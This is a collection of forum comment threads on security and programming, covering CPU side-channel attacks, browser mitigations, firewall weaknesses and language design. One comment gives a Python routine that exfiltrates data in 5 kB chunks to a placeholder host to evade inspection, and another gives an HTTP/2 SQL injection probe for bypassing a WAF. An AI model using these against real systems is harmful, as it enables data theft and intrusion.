1. 2

    Always nice to see this sort of comprehensive overview, since the space feels a bit overwhelming and it’s hard to know where to start learning.

    One question, not necessarily related to the material at hand, but something that stuck out to me:

    Soundness prevents false negatives, i.e., all possible unsafe inputs are guaranteed to be found, while completeness prevents false positives, i.e., input values deemed unsafe are actually unsafe.

    Did anyone else learn these definitions switched from the above? In my education (and in informal usage of the terms), “sound” meant “if you’re given an answer, it is actually valid” whereas “complete” meant “if it’s valid, it’ll be guaranteed to be given as an answer” (e.g. certain logic programming systems might be sound but not complete), which is the opposite. Do different sub-disciplines use these terms the other way around from how I learned them? (Or, did I learn it incorrectly?)

    1. 1

      Sorry for the late reply, this week has been trying!

      Wikipedia says it better than I will:

      In mathematical logic, a logical system has the soundness property if and only if every formula that can be proved in the system is logically valid with respect to the semantics of the system.

      “Complete” is a bit more complex, but basically something is complete when you can use it to derive every valid formula within the system. There are slight differences depending on which notion of completeness you’re discussing, such as complete formal languages vs. complete logical semantics.

      I don’t think you learnt it incorrectly; you probably just picked up the framing used in the area you were studying. Wrt the section quoted, the difference there is that you can either detect all possibly unsafe inputs (they are guaranteed to be logically valid for the domain and thus possibly unsafe) OR you can ensure that everything found is actually unsafe (i.e. it actually expresses the nature of “un-safety” in a particular program’s semantics).
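
      To make it concrete, here’s a toy sketch (my own illustration, not from the article) in Python. Say a program computes 1 / (x*x - 4), so the truly unsafe inputs are exactly {-2, 2}:

          # Truly unsafe inputs for 1 / (x*x - 4): x*x == 4, i.e. {-2, 2}.

          def sound_analyzer(x: int) -> bool:
              # Over-approximates: flags everything in [-2, 2]. No unsafe input
              # escapes (no false negatives, so it is sound), but it also flags
              # 0, a false positive, so it is not complete.
              return -2 <= x <= 2

          def complete_analyzer(x: int) -> bool:
              # Under-approximates: flags only the one case it can prove.
              # Everything it flags really is unsafe (no false positives, so it
              # is complete), but it misses -2, so it is not sound.
              return x == 2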

      Does that make more sense? It’s quite early here and I’m still ingesting caffeine, so I apologize if not…

    1. 3

      I was going to ask questions about “the kernel stack is executable”, but then I saw “MIPS”

      1. 2

        Interestingly, @brucem and I had that very conversation this morning as well, since MIPS limits options for certain things, but also brings new restrictions.

      1. 4

        $work:

        • I’m on research week, so more symbolic execution and future of smart contract stuff
        • some report editing
        • fixing up some client tooling
        • looking into some F# stuff I’m seeing in the space

        !$work:

        • I removed 369 lines of type parsing code from my compiler, which resulted from a simple grammar change I made
        • need to finish some more work on the match form
        • I’ve started stubbing out a new CTF I’m working on, a historical CTF with historical machines & languages
        1. 2

          Any more info on the historical CTF? That sounds really interesting.

          1. 2

            so I’ve written a historical CTF once before: Gopher, a modified RSH, and MUSH running atop Inferno, which was pretty interesting.

            For this one, I’d like to have a MULTICS/PR1MOS-like system and a VMS/TWENEX-like system that players must attack and defend. The code would be written in languages appropriate for those two systems (like a DCL clone, some Algol clones, and so on), with flags planted throughout. It’s a lot of work, but I think the result would be really fun, if quite challenging for participants (new languages, structures, protocols).

        1. 15

          Your thinkpad is shared infrastructure on which you run your editor and forty-seven web sites run their JavaScript. Is that a problem for you?

          1. 2

            Mmm what did you mean by this? I didn’t get it.

            1. 13

              In We Need Assurance, Brian Snow summed up much of the difficulty securing computers:

              “The problem is innately difficult because from the beginning (ENIAC, 1944), due to the high cost of components, computers were built to share resources (memory, processors, buses, etc.). If you look for a one-word synopsis of computer design philosophy, it was and is SHARING. In the security realm, the one word synopsis is SEPARATION: keeping the bad guys away from the good guys’ stuff!

              So today, making a computer secure requires imposing a “separation paradigm” on top of an architecture built to share. That is tough! Even when partially successful, the residual problem is going to be covert channels. We really need to focus on making a secure computer, not on making a computer secure – the point of view changes your beginning assumptions and requirements!”

              Although security features were added, the degree to which things are shared and packed closer together only increased over time to meet market requirements. Then researchers invented hundreds of ways to secure code and OS kernels. Not only were most ignored; the market shifted to turning browsers into OS’s running malicious code in a harder-to-analyze language whose compiler (JIT) was harder to secure due to timing constraints. Only a handful of high-security projects, like IBOS and Myreen’s, even attempted it. So, browsers running malicious code are a security threat in a lot of ways.

              That’s a subset of two larger problems:

              1. Any code in your system that’s not verified to have specific safety and security properties might be controlled by attackers upon malicious input.

              2. Any shared resource might leak your secrets to a malicious observer via covert channels, storage or timing. Side channels are basically the same concept applied more broadly, as in the physical world. Even the LEDs on your PC might leak internal state of the processor, depending on the design.
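
              To make the timing-channel point concrete, here’s a toy sketch in Python (my illustration, not from Snow’s paper): an early-exit comparison leaks how many leading bytes of a secret match, which is one of the simplest timing channels there is.

                  def leaky_equal(a: bytes, b: bytes) -> bool:
                      # Returns as soon as a byte differs, so the running time
                      # tells an observer how many leading bytes matched.
                      if len(a) != len(b):
                          return False
                      for x, y in zip(a, b):
                          if x != y:
                              return False
                      return True

                  def constant_time_equal(a: bytes, b: bytes) -> bool:
                      # Touches every byte no matter what (the stdlib’s
                      # hmac.compare_digest does this for you), closing that
                      # particular channel.
                      if len(a) != len(b):
                          return False
                      diff = 0
                      for x, y in zip(a, b):
                          diff |= x ^ y
                      return diff == 0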

              1. 2

                Hmm. I had a friend yonks ago who worked on BAE’s STOP operating system, that supposedly uses complex layers of buffers to isolate programs. I wonder how it’s stood up against the many CPU vulnerabilities.

                1. 4

                  I’ve been talking about STOP for a while but rarely see it mentioned. Cool that you knew someone who worked on it. Its architecture is summarized here along with GEMSOS’s. I have a detailed one for GEMSOS for tomorrow, too, if not previously submitted. The original implementation (SCOMP) also had an IOMMU that integrated with the kernel. That concept was re-discovered some time later.

                  Far as your question, I have no idea. These two platforms, along with SNS Server, have had no reported hacks for a long time. You know they have vulnerabilities, though. The main reasons I think the CPU vulnerabilities will affect them are (a) they’re hard to avoid and (b) certification requirements mean they rarely change these systems. They’re probably vulnerable, esp to RAM attacks. Throw network Rowhammer at them. :)

                2. 2

                  Thanks, that was really interesting and eye opening on the subject. I never saw it that way! :)

                3. 5

                  I think @arnt is saying that website JavaScript can exploit CPU bugs, so by browsing the internet you are “shared infrastructure”.

                  1. 6

                    Row Hammer for example had a JavaScript implementation, and Firefox (and others) have introduced mitigations to prevent those sorts of attacks. Firefox also introduced mitigations for Meltdown and Spectre because they could be exploited from WASM/JS… so it makes sense to mistrust any site you load on the internet, especially if you have an engine that can JIT (but all engines are suspect; look at how many pwn2own wins are via Safari or the like)
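
                    Those browser mitigations mostly work by degrading the high-resolution clocks the attacks depend on. A toy sketch of the idea in Python (just the concept, not Firefox’s actual implementation):

                        import time

                        RESOLUTION = 1e-3  # coarsen readings to 1 ms steps

                        def coarse_now() -> float:
                            # Round the clock down to the nearest RESOLUTION step,
                            # so nanosecond-scale differences (e.g. cache hit vs.
                            # miss) all read as the same value.
                            return (time.perf_counter() // RESOLUTION) * RESOLUTION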

                    1. 3

                      If browsers have built-in mitigations for this sort of thing, isn’t this an argument in favor of disabling the OS-level mitigations? JavaScript is about the only untrusted code that I run on my machine, so if that’s already covered I don’t see a strong reason to take a hit on everything I run.
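
                      (For reference, on Linux the kernel reports which mitigations are active, so you can at least see what you’d be turning off; a quick sketch assuming a 4.15+ kernel:)

                          # Print the mitigation status the kernel reports for
                          # each known CPU flaw.
                          from pathlib import Path

                          for f in sorted(Path("/sys/devices/system/cpu/vulnerabilities").iterdir()):
                              print(f"{f.name}: {f.read_text().strip()}")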

                      1. 4

                        I think the attack surface is large enough even with simple things like JavaScript that I’d be willing to take the hit, though I can certainly understand certain workloads where you wouldn’t want to, like gaming or scientific computing.

                        For example, JavaScript can be introduced in many locations, like PDFs, Electron, and so on. There are also things like Word documents, such as this RTF remote code execution for MS Word. Additionally, the mitigations in browsers are just that, mitigations; things like retpolines work in a larger setting with more “surface area” covered, vs timing mitigations and the like in browsers. It’s kinda like W^X page protections or ASLR: the areas that strictly need them are quite small, but it’s harder to find the individual applications with exploits, and easier to just apply the protection wholesale to the entire system.

                        Does that make sense?

                        tl;dr: JS is basically everywhere in everything, so it’s hard to just apply those fixes in a single location like a browser, when other things may have JS exposed as well. Furthermore, there are other languages, attack surfaces, and the like I’d be concerned about, so it’s just not worth it to rely only on browsers, which can only implement partial mitigations.

                        1. 1

                          Browsers do run volatile code supplied by others more than most other attack surfaces. You may have an archive of invoices in PDF format, as I have, and those may in principle contain JavaScript, but that JavaScript isn’t going to change all of a sudden, and it all originates from a small set of parties (in my case my scanning software and a single-digit number of vendors). Whereas example.com may well redeploy its website every Tuesday morning, giving you the latest versions of many unaudited third-party scripts, and neither you nor your bank’s web site really trust example.com or its many third-party scripts.

                          IMO that quantitative difference is so large as to be described as qualitative.

                          1. 1

                            The problem is when you bypass those protections you can have things like this NitroPDF exploit, which uses the API to launch malicious JS. I’ve used these sorts of exploits on client systems during assessments, adversarial or otherwise. So relying on one section of your system to protect you against something that is a fundamental CPU design flaw can be problematic; there’s nothing really stopping you from launching rowhammer from PostScript itself, for example. This is why the phrase “defense in depth” is so often mentioned in security circles, since there can be multiple failures throughout a system, but in a layered approach you can catch it at one of the layers.

                            1. 1

                              Oh, I’m not arguing that anyone should leave out everything except browser-based protection. Defense in depth is indisputably good.

                        2. 3

                          There’s also the concept of layers of defense. Let’s say the mitigation fails. Then you want the running, malicious code to be sandboxed somehow by another layer of defense. You might reduce or prevent damage. The next idea folks had was to mathematically prove the code could never fail. What if a cosmic ray flips a bit that changes that? Uh oh. Your processor is assumed to enable security; if you’re building an isolation layer on it, make it extra isolated just in case shared resources have an effect, and then only one of Spectre/Meltdown affects you, as with Muen. Layers of security are still a good idea.

                      2. 2

                        That’s not what I got from it. I perceived it as “You’re not taking good precautions on this low hanging fruit, why are you worried about these hard problems?”

                        I see it constantly, everyone’s always worried about X, and then they just upload everything to an unencrypted cloud.

                        1. 1

                          I actually did mean that when you browse the net, your computer runs code supplied by web site operators you may not trust, and some of those operators really are not trustworthy. Your computer is shared infrastructure running code supplied by users who don’t trust each other.

                          Your bank’s site does not trust those other sites you have open in other tabs, so that’s one user who does not trust others.

                          You may not trust them, either. A few hours after I posted that, someone discovered that some npmjs package with millions of downloads has been trying to steal bitcoin wallets, so that’s millions of pageviews that ran malevolent code on real people’s computers. You may not have reason to worry in this case, but you cannot trust sites to not use third-party scripts, so you yourself also are a distrustful user.

                    2. 2

                      This might be obvious, but I gotta ask anyway: Is there a real threat to my data when I, let’s say, google for a topic and open the first blog post that seems quite right?

                      • Would my computer be breached immediately (like I finished loading the site and now my computer’s memory is in North Korea)?
                      • How much data would be lost, and would the attacker be able to read any useful information from it?
                      • Would I be infected with something?

                      Of course I’m not expecting any precise numbers, I’m just trying to get a feel for how serious it is. Usually I felt safe enough just knowing which domains and topics (like pirated software, torrents, pron of course) to avoid, but is that not enough anymore?

                      1. 5

                        To answer your questions:

                        Would my computer be breached immediately (like I finished loading the site and now my computers memory is in north korea)?

                        Meltdown provides read access to privileged memory (including enclave memory) at rates of a couple of megabits per second (let’s assume 4). This means that if you have 8GB of RAM, it is now possible to dump the entire memory of your machine in about 4.5 hours.
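
                        Back-of-envelope, using Python as a calculator and assuming that 4 Mbit/s figure:

                            ram_bits = 8 * 10**9 * 8       # 8 GB of RAM, in bits
                            rate = 4 * 10**6               # assumed read rate, bits/s
                            print(ram_bits / rate / 3600)  # ~4.4 hours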

                        How much data would be lost, and would the attacker be able to read any useful information from it?

                        This depends on the attacker’s intentions. If they are smart, they just read the process table, figure out where your password manager or ssh keys for production are stored in RAM, and transfer the memory contents of those processes. If this is automated, it would take mere seconds in theory; in practice it won’t be that fast, but it’s certainly less than a minute. If they dump your entire memory, it will probably be all data in all currently running applications, and they will certainly be able to use it since it’s basically a core dump of everything that’s currently running.

                        Would I be infected with something?

                        Depends on how much of a target you are and whether or not the attacker has the means to drop something onto your computer with the information gained from what I described above. I think it’s safe to assume that they could though.

                        These attacks are quite advanced, and regular hackers will always go for the low-hanging fruit first. However, if you are a front-end developer in some big bank, big corporation or government institution which could face a threat from competitors and/or economic espionage, the answer is probably yes. You are probably not the true target the attackers are after, but your system is one hell of a springboard towards their real target.

                        It’s up to you to judge how much of a potential target you are, but when it happens, you do not want to be that guy/girl with the “patient zero” system.

                        Usually I felt safe enough just knowing which domains and topics (like pirated software, torrents, pron of course) to avoid, but is that not enough anymore?

                        Correct, it’s not enough anymore, because Rowhammer, Spectre and Meltdown have JavaScript or wasm variants (if they didn’t, we wouldn’t need mitigations in browsers). All you need is a suitable payload (the hardest part by far) and one simple website you frequently visit, running an out-of-date application (like WordPress, Drupal or Joomla, for example), to get that megabit-memory-reading Meltdown attack onto a system.

                        The attacker still has to know which websites those are, but they could send you a phishing mail with a link or some attachment that will be opened in an environment which supports JavaScript (or something else) to obtain your browsing history. In that light it’s good to know that some e-mail clients support the execution of JavaScript in received e-mail messages.

                        If there is one lesson to take home from Rowhammer, Spectre and Meltdown, it’s that there is no such thing as “computer security” anymore and that we cannot rely on the security mechanisms given to us by the hardware.

                        If you are developing sensitive stuff, do it on a separate machine and avoid frameworks, libraries, web-based tools, other linked-in stuff and each and every extra tool like the plague. Using an extra system, abandoning the next convenient tool, and taking extra security precautions are annoying and expensive, but not that expensive if your livelihood depends on it.

                        The central question is: do you have adversaries or competitors willing to go this far and spend about half a million dollars (my guesstimate of the required budget) to pull off an attack like this?

                        1. 1

                          Wow, thanks! Assuming you know what you’re talking about, your response is very useful and informative. And exactly what I was looking for!

                          […] figure out where your password-manager or ssh-keys for production are stored in ram […]

                          That is a vivid picture of the worst thing I could imagine, albeit I would only have to worry about my private|hobby information and deployment.

                          Thanks again!

                          1. 1

                            You’re welcome!

                            I have to admit that what I wrote above is the worst-case scenario I could come up with. But it is as the folks from Sonatype (of Maven Nexus repository fame) once stated: “Developers have to become aware of the fact that what their laptops produce at home, could end up as a critical library or program in a space station. They will treat and view their infrastructure, machines, development processes and environments in a fundamentally different way.”

                            Yes, there are Java programs and libraries from Maven Central running in the ISS.

                        2. 1

                          The classic security answer to that is that last year’s theoretical attack is this year’s nation-state attack, and next year it can be carried out by anyone who has a midprice GPU. Numbers change, fast. Attacks always get better, never worse.

                          I remember seeing an NSA gadget for $524000 about ten years ago (something to spy on ethernet traffic, so small as to be practically invisible), and recently a modern equivalent for sale for less than $52 on one of the Chinese gadget sites. That’s how attacks change.

                      1. 29

                        I share the author’s frustrations, but I doubt the prescriptions as presented will make a big difference, partly because they have been tried before.

                        And they came up with Common Lisp. And it’s huge. The INCITS 226–1994 standard consists of 1153 pages. This was only beaten by C++ ISO/IEC 14882:2011 standard with 1338 pages some 17 years after. C++ has to drag a bag of heritage though, it was not always that big. Common Lisp was created huge from the scratch.

                        This is categorically untrue. Common Lisp was born out of MacLisp and its dialects, it was not created from scratch. There was an awful lot of prior art.

                        This gets at the fatal flaw of the post: not addressing the origins of the parts of programming languages the author is rejecting. Symbolic representation is mostly a rejection of verbosity, especially that of COBOL (ever try to actually read COBOL code? I find it very easy to get lost in the wording), and a way to more closely represent the domains targeted by the languages. Native types end up existing because there comes a time when the ideal of maths meets the reality of engineering.

                        Unfortunately, if you write code for other people to understand, you have to teach them your language along with the code.

                        I don’t get this criticism of metaprogramming since it is true of every language in existence. If you do metaprogramming well, you don’t have to teach people much of anything. In fact, it’s the programmer that has to do the work of learning the language, not the other way around.

                        The author conveniently glosses over the fact that part of the reason there are so many programming languages is that there are so many ways to express things. I don’t want to dissuade the author from writing or improving on COBOL to make it suitable for the 21st century; they can even help out with the existing modernization efforts (see OO COBOL), although they may be disappointed to find out COBOL is not really that small.

                        If you do click through and finish the entire post you’ll see the author isn’t really pushing for COBOL. The key point is made: “Aren’t we unhappy with the environment in general?” This, I agree, is the main problem. No solution is offered, but there is a decent sentiment about responsibility.

                        1. 1

                          Also, if you want a smaller Lisp than CL with many of its more powerful features, there’s always ISLisp, which is one of the more under-appreciated languages I’ve seen. It has many of the nicer areas of CL, with the same syntax (unlike Dylan, which switched to a more Algol-like one), but still has a decent specification weighing in at a mere 134 pages.

                        1. 10

                          That was a surprisingly fun quick read.

                          An example of another language that would fit the bill, but be more…modern than the one described in TFA (no spoilers), would be REBOL.

                          It was the path not taken, sadly.

                          1. 9

                            You might be aware, but Red is following that path. But they’ve gone off on a cryptocurrency tangent; I’m not quite sure what’s going on there anymore.

                            1. 4

                              I think dialecting ala Rebol is super interesting, but I also think this sort of “wordy” input like AppleScript and DCL will eventually just become short forms that often require just as much effort to read later… that’s how you’d have things like show device... foreshortened to sho dev ....

                              Having said that, SRFI-10 or the #. form from Common Lisp is a happy medium, I think.

                              1. 3

                                that’s how you’d have things like show device… foreshortened to sho dev

                                I have not been responsible for a Cisco router in at least 15 years but I still find myself typing “sh ip int br” on occasion.

                                1. 2

                                  hahahaha oh lord, I know what you mean. I still have ancient devices burned in my brain as well, like OpenVMS and what not. Still, I think it goes to show that making things more “natural language-like” doesn’t really mean we want to write like that… there’s probably some balance to be struck between succinctness and power that we haven’t figured out yet

                              2. 2

                                I also loved the bit of engagement at the end with the buttons. There’s been a string of really well-written (light) technical articles lately; hope the trend continues.

                                I ported a REBOL app (using the full paid stack) to C# – the code inflation and challenge of making a 1:1 exact copy (no retraining port) was phenomenal. Most stuff took nearly an order of magnitude more code. There were some wins (dynamic layouts, resizing, performance) – but REBOL had shockingly good bang for the buck and dialects only really took a few days to grok.

                              1. 7

                                Pentesters always want to sound like it’s some sort of action movie, and I am tired of it.

                                Good on the company for having their security in order. Breaking in and prying out disks of laptops in storage is a bit over the top.

                                1. 14

                                  The hardest part of any security job is communicating your findings effectively to your audience.

                                  A pen-test of a corporate network is not the most exciting topic in the world of security so I’m sure attempts at adding some drama and a story helps.

                                  1. 4

                                    Depends on the scope of the assessment; I have had clients that have wanted me to break into things, and device theft was definitely in scope. Working adversary simulation, OPFOR, whatever, has different scope. On the flip side, I’ve definitely seen pentesters/red teamers who just want to “win” regardless of the scope or cost. This provides almost nothing of value to a client: if they knew their physical security was weak, breaking into the data center provides nothing to a client who wanted to know how well their validation schemes worked.

                                    I remember once being on site with another company that usually did “full scope” assessments as their bread-and-butter. The first day of their web app test, they:

                                    • tried to unplug a phone
                                    • spoofed the phone’s MAC address
                                    • bypassed network restrictions and NAC via the phone to get to a database

                                    on a web app… The client wanted to know about their web app, not their network security (which was actually fairly decent). Anyway, I finished my application assessment early and was asked to step in and take over that assessment…

                                  1. 8

                                    $work:

                                    • finishing a symbolic execution engine for a client’s custom programming language; need to add more primitives, and feed my computation traces to an actual SMT solver.
                                    • assessment work
                                    • writing some templates for our findings, some sales engineering and client meetings
                                    • Talk on blockchain security

                                    !$work:

                                    • finally finishing pattern matching in carML
                                    • adding some more threat hunting items to wolf-lord
                                    1. 2

                                      How did your client end up with a custom programming language?

                                      1. 2

                                        believe it or not, it’s surprisingly common in the blockchain space, esp wrt validator languages for proof of authority, as well as for “novel” smart contract languages.

                                    1. 15

                                      Q: is the HTTP protocol really the problem that needs fixing?

                                      I’m of the belief that if HTTP overhead is causing you issues, there are many alternative ways to fix it that don’t require more complexity. A site doesn’t load slowly because of HTTP; it loads slowly because it’s poorly designed in other ways.

                                      I’m also suspicious of Google’s involvement. HTTP/1.1 over TCP is very simple to debug and do by hand. Google seems to like closing or controlling open things (Google chat support for XMPP, Google AMP, etc). Extra complexity is something that should be avoided, especially for the open web.
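
                                      For instance, a complete HTTP/1.1 exchange is something you can type out and script in a few lines; a sketch in Python (with example.com as the stand-in host):

                                          import socket

                                          # The whole request is human-readable text, which is what
                                          # makes HTTP/1.1 easy to debug by hand, compared with the
                                          # binary framing in HTTP/2 and QUIC.
                                          request = (
                                              "GET / HTTP/1.1\r\n"
                                              "Host: example.com\r\n"
                                              "Connection: close\r\n"
                                              "\r\n"
                                          )

                                          with socket.create_connection(("example.com", 80)) as sock:
                                              sock.sendall(request.encode("ascii"))
                                              response = b""
                                              while chunk := sock.recv(4096):
                                                  response += chunk

                                          # Print just the status line and headers.
                                          print(response.decode("latin-1").split("\r\n\r\n")[0])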

                                      1. 10

                                        They have to do the fix on HTTP because massive ecosystems already depend on HTTP and browsers with no intent to switch. There’s billions of dollars riding on staying on that gravy train, too. It’s also worth noting lots of firewalls in big companies let HTTP traffic through but not better-designed protocols. The low-friction improvements get more uptake by IT departments.

                                        1. 7

                                          WAFs and the like barely support HTTP/2 tho; a friend gave a whole talk on bypasses and scanning for it, for example

                                          1. 6

                                            Thanks for the feedback. I’m skimming the talk’s slides right now. So far, it looks like HTTP/2 got big adoption but WAFs lagged behind. Probably just riding their cash cows, minimizing further investment. I’m also sensing a business opportunity if anyone wants to build an HTTP/2 and /3 WAF that works, with independent testing showing the others don’t. Might help bootstrap the company.

                                            1. 3

                                              ja, that’s exactly correct: lots of the big-name WAFs/NGFWs/&c. are missing support for HTTP/2 but many of the mainline servers support it, so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.
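
                                              A sketch of the kind of probe I mean, in Python with the httpx library (hypothetical target URL and payload; needs pip install httpx[http2]):

                                                  import httpx

                                                  TARGET = "https://waf-protected.example/search"  # hypothetical
                                                  PAYLOAD = {"q": "' OR '1'='1"}                   # classic SQLi probe

                                                  # Send the same payload over HTTP/1.1 and HTTP/2; a WAF
                                                  # that only parses HTTP/1.x may block one request and
                                                  # wave the other straight through.
                                                  for http2 in (False, True):
                                                      with httpx.Client(http2=http2) as client:
                                                          r = client.get(TARGET, params=PAYLOAD)
                                                          print(r.http_version, r.status_code)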

                                              I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…

                                              1. 4

                                                so we’ve definitely seen HTTP/2 as a technique to bypass things like SQLi detection, since they don’t bother parsing the protocol.

                                                Unbelievable… That shit is why I’m not in the security industry. People mostly building and buying bullshit. There are exceptions, but they’re usually set up to sell out later. Products based on dual-licensed code are about the only thing immune to vendor risk. Seemingly. Still exploring hybrid models to root out this kind of BS or force it to change faster.

                                                “I’ve also definitely considered doing something like CoreRuleSet atop HTTP/2; could be really interesting to release…”

                                                Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

                                                1. 5

                                                  Products based on dual-licensed code

                                                  We do this where I work, and it’s pretty nice, tho of course we have certain things that are completely closed source. We have a few competitors that use our products, so it’s been an interesting ecosystem to dive into for me…

                                                  Experiment however you like. I can’t imagine what you release being less effective than web firewalls that can’t even parse the web protocols. Haha.

                                                  pfff… there’s an “NGFW” vendor I know that…

                                                  • when it sees a connection it doesn’t know, it analyzes the first 5 kB
                                                  • the connection is allowed to continue until byte 5k+1 arrives
                                                  • so if your exfiltration process transfers data in packages of <= 5 kB, you’re OK!

                                                  we found this during an adversary simulation assessment (“red team”), and I think it’s one of the most asinine things I’ve seen in a while. The vendor closed it as “works as expected”.
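
                                                  To spell out why that’s asinine, a sketch (Python, with a placeholder destination from the documentation address range): anything that stays at or under the inspection window per connection never gets looked at.

                                                      import socket

                                                      CHUNK = 5 * 1024               # stay within the 5 kB window
                                                      DEST = ("203.0.113.10", 4444)  # placeholder destination

                                                      def exfiltrate(data: bytes) -> None:
                                                          # One fresh connection per chunk: every byte of every
                                                          # connection falls inside the window the device has
                                                          # already decided to allow.
                                                          for i in range(0, len(data), CHUNK):
                                                              with socket.create_connection(DEST) as s:
                                                                  s.sendall(data[i:i + CHUNK])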

                                                  edit fixed the work link as that’s a known issue.

                                                  1. 3

                                                    BTW, Firefox complains when I go to https://trailofbits.com/ that the cert isn’t configured properly…

                                                    1. 2

                                                      hahaha Nick and I were just talking about that; it’s been reported before, I’ll kick it up the chain again. Thanks for that! I probably should edit my post for that…

                                                      1. 2

                                                        Adding another data point: latest iOS also complains about the cert

                                          2. 3

                                            They have to do the fix on HTTP

                                            What ‘fix’? Will this benefit anyone other than Google?

                                             I’m concerned that if this standard is not actually a worthwhile improvement for everyone else, then it won’t be adopted and the IETF will lose respect. My guess is that it’s going to have even less adoption than HTTP/2.

                                          3. 13

                                            I understand and sympathize with your criticism of Google, but it seems misplaced here. This isn’t happening behind closed doors. The IETF is an open forum.

                                            1. 6

                                              just because they do some subset of the decision making in the open shouldn’t exempt them from blame

                                              1. 3

                                                 Feels like Google’s turned a lot of public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

                                                1. 5

                                                   Any browser vendor can ship what they want if they think that makes them more attractive to users or what not. That doesn’t make it a standard. WebUSB shipped in Chrome (and only in Chrome) more than a year ago. The WebUSB spec is still an Editor’s Draft, and it seems unlikely to advance significantly along the standards track.

                                                  The problem is not with the standards bodies, but with user choice, market incentive, blah blah.

                                                  1. 3

                                                     Feels like Google’s turned a lot of public standards bodies into rubber stamps for pointless-at-best, dangerous-at-worst standards like WebUSB.

                                                    “WebUSB”? It’s like kuru crossed with ebola. Where do I get off this train.

                                                  2. 2

                                                    Google is incapable of doing bad things in an open forum? Open forums cannot be influenced in bad ways?

                                                     This does not dispel my concerns :/ What do you mean exactly?

                                                    1. 4

                                                      If the majority of the IETF HTTP WG agrees, I find it rather unlikely that this is going according to a great plan towards “closed things”.

                                                       Your “things becoming closed-access” argument doesn’t hold, imho. While I have done lots of plain-text debugging for HTTP, SMTP, POP and IRC, I can’t agree with it as a strong argument: whenever debugging gets serious, I go back to writing a script anyway. Also, I really want the web to become encrypted by default (HTTPS). We need “plain text for easy debugging” to go away. The web needs to be great (secure, private, etc.) for users first, engineers second.

                                                      1. 2

                                                         That “users first, engineers second” mantra leads to things like Apple and Microsoft clamping down on the “general purpose computer”: think of the children, er, the users! They can’t protect themselves. We’re facing this at work (“the network and computers need to be secure, private, etc.”), and it’s expected we won’t be able to do any development because, of course, upper management doesn’t trust us mere engineers with “general purpose computers”. Why can’t it be for “everybody”? Engineers included?

                                                        1. 1

                                                          No, no, you misunderstand.

                                                          The users first / engineers second is not about the engineers as end users like in your desktop computer example.

                                                          What I mean derives from the W3C design principles. That is to say, we shouldn’t avoid significant positive change (e.g., HTTPS over HTTP) just because it’s a bit harder on the engineering end.

                                                          1. 6

                                                            Define “positive change.” Google shoved HTTP/2 down our throats because it serves their interests not ours. Google is shoving QUIC down our throats because again, it serves their interests not ours. That it coincides with your biases is good for you; others might feel differently. What “positive change” does running TCP over TCP give us (HTTP/2)? What “positive change” does a reimplementation of SCTP give us (QUIC)? I mean, other than NIH syndrome?

                                                            1. 3

                                                              Are you asking how QUIC and H2 work, or are you saying performance isn’t worth improving? If it’s the latter, I think we’ve figured out why we disagree here. If it’s the former, I kindly ask you to find out yourself before you enter this dispute.

                                                              1. 3

                                                                I know how they work. I’m asking, why are they reimplementing already implemented concepts? I’m sorry, but TCP over TCP (aka HTTP/2) is plain stupid—one lost packet and every stream on that connection hits a brick wall.

                                                                1. 1

                                                                  SPDY and its descendants are designed to allow web pages with lots of resources (namely, images, stylesheets, and scripts) to load quickly. A sizable number of people think that web pages should just not have lots of resources.

                                                  1. 1

                                                    Super interesting post; I deal with this quite a bit during assessments of blockchain code that uses TypeScript on the front end, and discussing “why you can’t use floats for currency” often comes up. I like what I’m seeing here tho; I don’t know if I can directly recommend it to clients, but it’s an interesting discussion point for me to use.
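
                                                    The demo I usually reach for in that discussion, in Python here rather than TypeScript, though the IEEE 754 behavior is identical:

                                                        from decimal import Decimal

                                                        # Binary floats can't represent most decimal fractions exactly:
                                                        print(0.1 + 0.2)         # 0.30000000000000004
                                                        print(0.1 + 0.2 == 0.3)  # False

                                                        # The usual fixes: integer minor units (cents), which is the
                                                        # sort of representation Dinero.js uses...
                                                        total_cents = 3 * 1999   # exact: 5997

                                                        # ...or a decimal type:
                                                        print(Decimal("0.10") + Decimal("0.20") == Decimal("0.30"))  # True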

                                                    1. 3

                                                      Yep, dealing with the actual monetary values is another big topic which I didn’t really bother to cover here, mostly because I think it’s already been covered in detail (Javascript, Haskell). Thankfully to turn them into bills and coins I only have to deal with the resulting values; all the heavy lifting in my project is done by Dinero.js with this typings file.

                                                      1. 1

                                                        that’s really interesting, thanks for that!

                                                        Where I usually see issues with clients is code that has two different rounding mechanisms (such as between their own bespoke safemath library for Ethereum and JavaScript). It’s an interesting discussion point to be had, and those links are also interesting, thanks for those!

                                                        1. 1

                                                          Good links, dude!

                                                      1. 3

                                                        $work:

                                                        • reaping the joy of automating a bunch of infrastructure by bringing up a few new instances of our app in various geolocations for local use there. Super satisfying seeing the work we put in ahead of time pay off. (We knew a few months ago we’d absolutely have to do this, so it was just a case of when not if.)

                                                        !$work:

                                                        • Monthly pub quiz with family
                                                        • Finally got the spare Microserver booting reliably from the SSD (… by making it boot from USB which then loads everything from the SSD. Three cheers for grub.) which means I need to invest some time into making everything run on the server now.
                                                        • Flying to Madrid on Friday for a long weekend visit. First time visiting Spain 🇪🇸, really looking forward to it. (Not taking a laptop 🙃)
                                                        1. 2

                                                          I like this format, gonna steal it :)

                                                          1. 2

                                                            Hah, more than welcome to. Fairly sure I’m just regurgitating prior art from other people on these threads previously. 😁

                                                        1. 7

                                                          When I first read about Capsicum back in 2010 I thought it was a very cool idea, much like the later pledge system call in OpenBSD. I especially liked the idea that they introduced Capsicum calls to Google Chromium, as browsers are just piles and piles of code that you just generally have to trust. It’s just really unfortunate that these things are all tied to a specific operating system.

                                                          I wonder if those Capsicum changes were ever accepted upstream and are still maintained?

                                                          1. 21

                                                            It was intended to be a cross-platform concept. Lots of the big companies have Not Invented Here syndrome, which sort of ties into them liking to control and patent anything they depend on, too. Examples:

                                                            1. Google’s NaCl was weaker, but faster, than capability security. Android just used Java and basic permissions.

                                                            2. Microsoft Research made a lot of great stuff but Windows division only applies tiniest amount of what they do.

                                                            3. I saw a paper once about Apple trying to integrate Capsicum into Mac OS. I’m not sure if that went anywhere.

                                                            4. Linux tried a hodgepodge of things, with SELinux containing most malware at one point. It was a weaker version of what the MLS and Type Enforcement branches of high security were doing in the LOCK project. These days, it’s even more of a hodgepodge, with lots of techniques focused on one kind of protection or issue sprinkled all over the ecosystem. Too hard to evaluate its actual security.

